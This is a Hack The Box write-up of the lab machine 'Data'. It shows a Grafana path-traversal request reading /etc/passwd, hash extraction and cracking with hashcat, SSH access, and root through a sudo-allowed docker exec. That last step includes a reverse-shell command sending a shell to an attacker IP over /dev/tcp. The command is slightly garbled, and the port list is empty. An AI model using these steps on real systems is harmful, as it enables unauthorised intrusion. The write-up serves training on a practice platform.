// htb writeup Hack The Box 2026-02-25
Data
HackTheBox Easy Hack The Box
← all boxes
root obtained // PWNED

🧪 Hack The Box — Data

Platform: Hack The Box
Difficulty: Easy
IP: 10.129.238.160
Date Completed: 2025-07-25

🧭 Overview

This box explores vulnerabilities in Grafana — including directory traversal, SQLite DB leaks, salted SHA-256 password hashes, and Docker container privilege escalation.

🔍 Enumeration

nmap -sC -sV 10.129.238.160

Ports found:

Directory traversal on Grafana exposed system files:

GET /public/plugins/welcome/../../../../../../../../../../../../../etc/passwd

Extracted grafana.db and dumped the user table via SQLite:

SELECT * FROM user;

Used grafana2hashcat to convert salted hashes and cracked them with hashcat -m 10900.

💻 Foothold

Logged in as boris via SSH:

ssh boris@data.htb

Got user.txt:

105d3977d1672bd473f25178xxxxx

⚙️ Privilege Escalation

sudo -l

(root) NOPASSWD: /snap/bin/docker exec *

Used Docker exec to escape into the container:

sudo docker exec --interactive --privileged --user root <container_id> /bin/sh -i >& /dev/tcp/10.10.14.4/4444 0>&1

Or used Penelope to catch shell.

Got root.txt:

40fec1da153ae8450e86a4b33a9cxxxxx

✅ Summary

User: Extract Grafana DB → Hashcat crack → SSH as boris
Root: Docker exec on privileged container → root shell

← all boxes 0x74617465.sh blue team →